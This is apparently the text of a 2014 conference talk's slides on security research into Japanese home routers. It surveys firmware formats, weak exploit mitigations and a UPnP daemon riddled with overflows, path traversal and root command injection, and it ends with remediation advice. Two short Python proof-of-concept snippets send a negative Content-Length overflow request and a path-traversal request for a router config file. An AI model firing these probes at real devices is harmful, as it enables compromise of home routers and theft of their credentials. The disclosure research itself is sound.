Embed Size (px)
Citation preview
Embedded Security in the Land of the Rising Sun Ben Schmidt (presenter) // @_supernothing Lord Commander of Security Research @NarfIndustries
Paul Makowski (assistant to the presenter) // @myhndl Director of World Domination @NarfIndustries
this talk: Japanese router hacking ● motivation ● 0knowledge to 0day ● landscape ● attack surface ● vulnerabilities ● exploitation demos ● remediation
why hack Japanese routers? ● comparatively little public research ● who doesn’t loves junk hacking?* ● in seriousness, these routers matter a lot
o there are many listening on WAN o they run notoriously insecure software
* the answer is Dave Aitel: https://lists.immunityinc.com/pipermail/dailydave/2014-September/000746.html
← top countries with hosts listening on WAN port 1900 (UPnP default). ● Japan is #4 ● more on UPnP later
0knowledge to 0day
* there’s still plenty we don’t know
● when we started, we knew nothing about the Japanese router landscape*
● barriers: language, infrastructure, hardware acquisition & testing
we hope we don’t set ourselves on fire...
0knowledge to 0day ● mostly cultural, few technical obstacles
mitigation enabled? good for us?
full ASLR (including PIE) no
NX / DEP? mostly no
stack or heap cookies mostly yes
safe unlinking / heap hardening sometimes Such security, many lulz, wow
landscape ● a boatload of:
o routers o modems o wifi hotspots o webcams o internet-connected picture frames o … much more
landscape, con’t many manufacturers; this is a small sample
(likely) corp
how to ID models protections good for us?
OKI distributed as .bin, is actually .tar.gz, contains ROOTIMG.BIN which is several JFFS2 partitions
XXXXXXXXXXX XXXXXXXXXXX XXXXXXXXXXX XXXXXXXXXXX ...
none
landscape, con’t many manufacturers; this is a small sample
(likely) corp
how to ID models protections good for us?
Buffalo binary blob, begins with “bgn” XXXXXXXXXXX XXXXXXXXXXX XXXXXXXXXXX XXXXXXXXXXX ...
encrypted, (slightly) modified RC4 w/ static key “Buffalo”
Watch https://narfindustries.com/codeblue2014 for more complete list.
attack surface ● HTTP
o frequently LAN-facing
● FTP ● … ● UPnP
o frequently WAN-facing
speaking of UPnP...
Security Flaws in UPnP: Unplug, Don’t Play, Rapid7
Security Flaws in UPnP: Unplug, Don’t Play, Rapid7
speaking of UPnP...
we looked here
● Shodan o 3mil hosts in Japan o almost none anywhere else
● our research o ~200,000 hosts in Japan at
any single time
● What would you do with a 200,000+ botnet?
our favorite UPnP daemon: XXXXXX
our favorite UPnP daemon: XXXXXX ● case study: CompSci security 101 ● every vulnerability you can imagine,
everywhere feasible o stack & heap buffer overflows
! memcpy, strcpy, sprintf, oh my! o path traversal
! download passwords in config files o command injection
! as root, duh
spot-the-vuln(s)
our favorite UPnP daemon: XXXXXX
attacker controlled
attacker controlled
spot-the-vuln(s)
our favorite UPnP daemon: XXXXXX
...here
buffer is overflown...
attacker controlled
attacker controlled
spot-the-vuln(s)
our favorite UPnP daemon: XXXXXX
...here
oh yeah and here too
buffer is overflown...
attacker controlled
attacker controlled
spot-the-vuln(s)
our favorite UPnP daemon: XXXXXX
...here but why try harder?
root command injection...
...here
oh yeah and here too
buffer is overflown...
attacker controlled
attacker controlled
spot-the-vuln(s)
our favorite UPnP daemon: XXXXXX
...here
oh yeah and here too
but why try harder?
root command injection...
...here
also here
buffer is overflown...
attacker controlled
attacker controlled
our favorite UPnP daemon: XXXXXX in other words…
● 4 lines ● 4 remotely
exploitable vulnerabilities
demo: UPnP command injection
HTTP: signedness confusion 1. specify a negative Content-Length 2. sanity check does a signed comparison
o the check passes 3. scanf() promotes int to unsigned, copies length
specified 4. overflow heap buffer 5. ??? 6. profit
demo: HTTP signedness confusion import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((“192.168.1.1”, 2869)) s.send('GET AAAA\r\nContent-Length: -34\r\n\r\n') s.close()
HTTP: path traversal 1. http://192.168.1.1:2869/../SuperSecretStuff 2. ??? 3. profit
seriously.
demo: HTTP path traversal
import requests print requests.get('http://192.168.1.1:2869/../mainConfig.xml').text
why this matters ● what to do with 200,000 home routers?
o violate privacy, capture all traffic o impersonate victims o man-in-the-middle, exploit end hosts o use as basis for covert infrastructure, misattributing
further attacks o cripple national infrastructure through DDoS attacks
more Japanese statistics ● 200,000+: number of routers / modems running the
discussed vulnerable UPnP service on WAN ● 500,000+: number of devices running a UPnP daemon
and listening on WAN on the default port o can be used to map internal ports, expose additional vulns
● 1,700,000+: number of devices running an HTTP daemon and listening on WAN on the default port o 93,000+ of these are not running either Apache or IIS
remediation ● patching vulns is a non-starter
o there’s too many, no one cares to find them all
● what we’ve demonstrated is only the beginning o seriously, we ctrl-f’ed for system()... profit
● need to start over
remediation: manufacturers (1/3) ● use modern exploit mitigations
o userspace: NX / DEP, ASLR*, stack / heap hardening
o kernelspace: grsecurity
● fail closed: default settings matter o don’t listen to anything on WAN by default o if remote admin is required by the customer, require
key-based authentication (e.g. SSH, CWMP/TR-069 or similar)
* This means PIE. Binaries that are not PIE are not full ASLR. Anything less than full ASLR is mostly pointless.
remediation: manufacturers (2/3) ● privilege separation
o there is no reason to run everything as root*
● sandbox everything: seccomp_bpf() o Why is your UPnP daemon able to install kernel
modules or read / write outside of its home?
● don’t implement your own HTTP / FTP / UPnP/ Gopher / whatever service o obscurity < audited code * Laziness doesn’t count.
It’s 2014; attackers have a lot to gain, you have a lot to lose and embedded devices are often the lowest hanging fruit.
remediation: manufacturers (3/3) ● deter physical access
o cut unnecessary debug ports, no JTAG, no serial o limited effect on determined attackers
● make analysis difficult o firmware encryption & signing
● scope the set of possible vulnerabilities o if you must write your own software, why not write it
in Python or Ruby?
things that don’t work ● security through obscurity
o yes, someone* has figured out how to extract YetAnotherObscureFileSystem
● outmoded threat models / thinking your software isn’t interesting o attackers target more than end hosts o there is plenty (sometimes more) value in pwning
infrastructure * The contributors and projects behind binwalk (https://github.com/devttys0/binwalk) to be specific.
remediation: end users ● firewall everything
o only sane approach is to assume compromise on seldom-updated embedded devices such as modems and routers
o the catch: many of these embedded devices are between you and the Internet
● whenever possible, run custom firmware o let someone else be the easiest target
conclusions ● there needs to be more (public) research interest in
Japanese infrastructure ● cultural barriers are surmountable even by curious
people in their spare time o we conducted this research from the US, without direct access
to Japanese infrastructure or devices o determined attackers will hardly be slowed
● the fixes are not simple o vulnerabilities are numerous o problems run deep
thanks ● Google translate ● Yahoo! auctions ● Icons licensed under CC BY 3.0:
o router, modem, wifi, webcam, question mark, flame by flaticon.com user Freepik
o picture frame by flaticon.com user Icomoon o thumb’s up by flaticon.com user Amit Jakhu o video camera by flaticon.com user
simpleicon
questions?
? Want to learn more? Narf offers custom embedded device security training classes in Japanese & English. Material is licensed & translated from TacNetSol’s world-renowned EDE course. For more information, visit our website: https://narfindustries.com/index.php?id=training
